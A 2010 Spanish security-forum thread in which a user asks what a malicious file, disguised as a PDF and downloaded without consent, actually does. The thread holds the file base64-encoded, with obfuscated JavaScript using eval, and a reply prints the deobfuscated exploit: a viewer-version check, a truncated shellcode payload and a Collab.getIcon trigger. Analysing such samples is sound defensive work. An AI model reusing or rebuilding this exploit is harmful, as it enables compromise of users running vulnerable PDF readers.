elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  ¿Alguien sabe que hace este código?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Alguien sabe que hace este código?  (Leído 4,282 veces)
Demenus

Desconectado Desconectado

Mensajes: 1


Ver Perfil
¿Alguien sabe que hace este código?
« en: 13 Mayo 2010, 01:34 am »

Pues resulta que me he metido en una web y se me ha bajado sin mi permiso este lindo archivo como si fuera un PDF, al examinarlo me he encontrado con esto en su interior, por ello agradeceria mucho si alguien pudiera decirme a grosso modo que hace este código, porque yo en progrmación, muy bueno no soy XDD
Muchas gracias a todos

PD: La lista de numeros (factoriales??) del estilo 145! 24!... era mucho mas larga, la he cortado para que el post no sea tan horrendo XDDDD


Código:
YSVQREYtMTExMTMzMTExMTEzMzMzMzEKMyAwIG9iagolCjw+CmVuZG9iagolCjQgMCBvYmoKPD4Kc3RyZWFtCmVuZHN0cmVhbQplbmRvYmoKJQoxIDAgb2JqCjw+CmVuZG9iago1IDAgb2JqCjw+CmVuZG9iagoyIDAgb2JqCjw8Ci9Qcm9jU2V0IFsvUERGIC9UZXh0IC9JbWFnZUIgL0ltYWdlQyAvSW1hZ2VJXQovRm9udCA8PAovRjEgNSAwIFIKPj4KL1hPYmplY3QgPDwKPj4KPj4KZW5kb2JqCiUKNiAwIG9iago8PAovTmFtZXMgWyhhc2pkbikgNyAwIFIgXQo+PgplbmRvYmoKNyAwIG9iago8PAovUyAvamF2YXNjcmlwdAovSlMgKAogcyA9ICIgMTAhIDExOCEgOTchIDExNCEgMzIhIDk3ISAxMTQhIDExNCEgMTIxISAzMiEgNjEhIDMyISAxMTAhIDEwMSEgMTE5ISAzMiEgNjUhIDExNCEgMTE0ISA5NyEgMTIxISA0MCEgNDEhIDU5ISAxMCEgMTAyISAxMTchIDExMCEgOTkhIDExNiEgMTA1ISAxMTEhIDExMCEgMzIhIDEwMiEgMTA1ISAxMjAhIDk1ISAxMDUhIDExNiEgNDAhIDEyMSEgOTchIDExNCEgMTE1ISAxMTIhIDQ0ISAzMiEgMTA4ISAxMDEhIDExMCEgMTE0ISAxMTAhIDMyISAxMjEhIDk3ISAxMTQhIDExNSEgMTEyISA1OSEgMzIhIDEwISAxMjUhIDEwISAxMTghIDk3ISAxMTQhIDMyISAxMTghIDEwMSEgMTE0ISAxMTUhIDEwNSEgMTExISAxMTAhIDMyISA2MSEgMzIhIDk3ISAxMTIhIDExMiEgNDYhIDExOCEgMTA1ISAxMDEhIDExOSEgMTAxISAxMTQhIDg2ISAxMDEhIDExNCEgMTE1ISAxMDUhIDExMSEgMTEwISA1OSEgMTAhIDEwNSEgMTAyISAzMiEgNDAhIDExOCEgMTAxISAxMTQhIDExNSEgMTA1ISAxMTEhIDExMCEgMzIhIDYyISAzMiEgNTYhIDQxISAzMiEgMTAhIDEyMyEgMTAhIDExOCEgOTchIDExNCEgMzIhIDExMiEgOTchIDEyMSEgMTA4ISAxMTEhIDk3ISAxMDAhIDMyISA2MSEgMzIhIDExNyEgMTEwISAxMDEhIDExNSEgOTkhIDk3ISAxMTIhIDEwMSEgNDAhIDM0ISAzNyEgMTE3ISA2NSEgNDkhIDU0ISA1MiEgMzchIDExNyEgNDghIDQ4ISA0OSEgNTYhIDM3ISAxMTchIDQ4ISA0OCEgNDghIDQ4ISAzNyEgMTE3ISA1MiEgNDghIDU2ISA2NiEgMzchIDExNyEgNTYhIDY2ISA1MSEgNDghIDM3ISAxMTchIDUzISA1MiEgNTIhIDEwISAzMiEgOTchIDExMiEgMTEyISA0NiEgMTAwISAxMTEhIDk5ISA0NiEgNjchIDExMSEgMTA4ISAxMDghIDk3ISA5OCEgNDYhIDEwMyEgMTAxISAxMTYhIDczISA5OSEgMTExISAxMTAhIDQwISAxMTYhIDg1ISA3NyEgMTA0ISA3OCEgOTghIDcxISAxMTkhIDQxISA1OSEgMTAhIDEyNSEgMTAhIDEyNSEgMTAiLnJlcGxhY2UoL1tBLVphLXpdL2csZnVuY3Rpb24gKHN0KXthPTIyMztiPTY1O3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoKHN0ID0gc3QuY2hhckNvZGVBdCgwKSkgJiBhKSAtMTArNjIpICUxMCsxNiArIChzdCAmIDMxKzEpICsgYik7fSkuc3BsaXQoIiEgIik7dmFyIEprbm5Cdj0iZm8iO3ZhciBxcWVlclI9InIiO3ZhciBxcnQ9IihpIjt2YXIgSEhqZHhjPSI9MCI7dmFyIHVpdVRXPSJpPCI7dmFyIFZxd2Vxd2V0PSJsIisiZW4iO3ZhciBkZj0iKyIrIisiOwp2YXIgVFR5cmVRPSI9UyI7LypsbGxsbGxsbGwqLy8qbGxsbGxsbGxsKi8vKmxsbGxsbGxsbCovdmFyIG5tTUo9Im8iOy8qbGxsbGxsbGxsKi8vKmxsbGxsbGxsbCovdmFyIHR5dWlkPSJvIjsvKmxsbGxsbGxsbCovdmFyIFlVaW90cj0iW2ldKTt9IjtwID0iIjsvKmxsbGxsbGxsbCovZXZhbChKa25uQnYrcXFlZXJSK3FydCtISGpkeGMrIjsiK3VpdVRXKyJzLiIrVnF3ZXF3ZXQrImd0aCIrIjtpIitkZisiKXsiKyJwKyIrVFR5cmVRKyJ0cmkiKyJuZyIrIi5mciIrbm1NSisibUMiKyJoIisiYXJDIit0eXVpZCsiZGUiKyIocyIrWVVpb3RyKTsvKmxsbGxsbGxsbCovZXZhbChwKTsvLypsbGxsbGxsbGwqLy8qbGxsbGxsbGxsKi8vKmxsbGxsbGxsbCovLy8vKmxsbGxsbGxsbCovLypsbGxsbGxsbGwqLy8qbGxsbGxsbGxsKi8vKQo+PgplbmRvYmoKJQo4IDAgb2JqCjw8Ci9Qcm9kdWNlciAoTmVUU25yeCkKL1RpdGxlIChvRDg2M3FBKQovU3ViamVjdCAoUUpwZzNqKQovQXV0aG9yIChWZ2dMelhHMFpaNSkKL0tleXdvcmRzIChrR0NPTGFFbml6SHApCi9DcmVhdG9yICh0dkVlU0ZDUHgpCi9DcmVhdGlvbkRhdGUgKEQ6MjAwOTA1MDEyMTIxNDUpCj4+CiUKZW5kb2JqCjkgMCBvYmoKPDwKL1R5cGUgL0NhdGFsb2cKL1BhZ2VzIDEgMCBSCi9PcGVuQWN0aW9uIFszIDAgUiAvRml0SCBudWxsXQovUGFnZUxheW91dCAvT25lQ29sdW1uCi9OYW1lcyA8Pgo+PgolCmVuZG9iagolCnhyZWYKMCAxMAowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAyMzggMDAwMDAgbiAKMDAwMDAwMDQyMSAwMDAwMCBuIAowMDAwMDAwMDA5IDAwMDAwIG4gCjAwMDAwMDAwODcgMDAwMDAgbiAKMDAwMDAwMDMyNSAwMDAwMCBuIAowMDAwMDAwNTI1IDAwMDAwIG4gCjAwMDAwMDA1NzIgMDAwMDAgbiAKMDAwMDAxNDk4MiAwMDAwMCBuIAowMDAwMDE1MTU5IDAwMDAwIG4gCnRyYWlsZXIKJQo8PAovU2l6ZSAxMAovUm9vdCA5IDAgUgovSW5mbyA4IDAgUgo+PgpzdGFydHhyZWYKMTUyOTEKJSUlRU9GCiU=

Mod: código en base64, sino algunos AV saltan al ingresar a la página


« Última modificación: 15 Mayo 2010, 02:15 am por Novlucker » En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: ¿Alguien sabe que hace este código?
« Respuesta #1 en: 15 Mayo 2010, 03:55 am »

Eso es un exploit en pdf ... seguro descarga algo más, pero a donde apunta y demás, ni idea, tu lo has recortado :xD

Saludos


En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: ¿Alguien sabe que hace este código?
« Respuesta #2 en: 15 Mayo 2010, 10:28 am »

Código desofuscado:

Código
  1. s = String(" 10! 118! 97! 114! 32! 97! 114! 114! 121! 32! 61! 32! 110! 101! 119! 32! 65! 114! 114! 97! 121! 40! 41! 59! 10! 102! 117! 110! 99! 116! 105! 111! 110! 32! 102! 105! 120! 95! 105! 116! 40! 121! 97! 114! 115! 112! 44! 32! 108! 101! 110! 114! 110! 32! 121! 97! 114! 115! 112! 59! 32! 10! 125! 10! 118! 97! 114! 32! 118! 101! 114! 115! 105! 111! 110! 32! 61! 32! 97! 112! 112! 46! 118! 105! 101! 119! 101! 114! 86! 101! 114! 115! 105! 111! 110! 59! 10! 105! 102! 32! 40! 118! 101! 114! 115! 105! 111! 110! 32! 62! 32! 56! 41! 32! 10! 123! 10! 118! 97! 114! 32! 112! 97! 121! 108! 111! 97! 100! 32! 61! 32! 117! 110! 101! 115! 99! 97! 112! 101! 40! 34! 37! 117! 65! 49! 54! 52! 37! 117! 48! 48! 49! 56! 37! 117! 48! 48! 48! 48! 37! 117! 52! 48! 56! 66! 37! 117! 56! 66! 51! 48! 37! 117! 53! 52! 52! 10! 32! 97! 112! 112! 46! 100! 111! 99! 46! 67! 111! 108! 108! 97! 98! 46! 103! 101! 116! 73! 99! 111! 110! 40! 116! 85! 77! 104! 78! 98! 71! 119! 41! 59! 10! 125! 10! 125! 10").split("! ");
  2. p = '';
  3.  
  4. for(i=0;i<s.length;i++){
  5. p+=String.fromCharCode(s[i]);
  6. }

Al ejecutarlo nos da un 'eval(p)', siendo 'p':

Código
  1. var arry = new Array();
  2. function fix_it(yarsp, lenrn yarsp;
  3. }
  4. var version = app.viewerVersion;
  5. if (version > 8)
  6. {
  7. var payload = unescape("%uA164%u0018%u0000%u408B%u8B30%u544
  8. app.doc.Collab.getIcon(tUMhNbGw);
  9. }
  10. }
  11.  

Y no puedo decir mucho menos... :S
En línea

Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ


Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: ¿Alguien sabe que hace este código?
« Respuesta #3 en: 15 Mayo 2010, 20:51 pm »

Por eso digo, yo lo he desofuscado también, pero como esta recortado falta el resto de la info :xD

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: ¿Alguien sabe que hace este código?
« Respuesta #4 en: 15 Mayo 2010, 22:44 pm »

:xD pero creo que ese bug lo repararon hace unos meses, el problema esta en que los usuarios no actualizan cuando salen las actualizaciones.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguien sabe como esta cifrado este codigo
Nivel Web
jeshuem 7 5,024 Último mensaje 2 Enero 2011, 01:28 am
por xassiz~
alguien sabe que es lo que hace este codigo????
Desarrollo Web
Paul Young 3 2,515 Último mensaje 20 Julio 2012, 15:15 pm
por Spider-Net
¿alguien sabe como se hace este scrip de espera en php?
PHP
Weeken 1 2,381 Último mensaje 22 Septiembre 2012, 03:49 am
por WarGhost
alguien sabe como se hace este script ?
PHP
Weeken 6 5,184 Último mensaje 13 Mayo 2013, 01:32 am
por #!drvy
¿Alguien sabe qué onda con este código?
Desarrollo Web
theluigy13etv 2 3,298 Último mensaje 21 Febrero 2016, 19:36 pm
por karmany
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines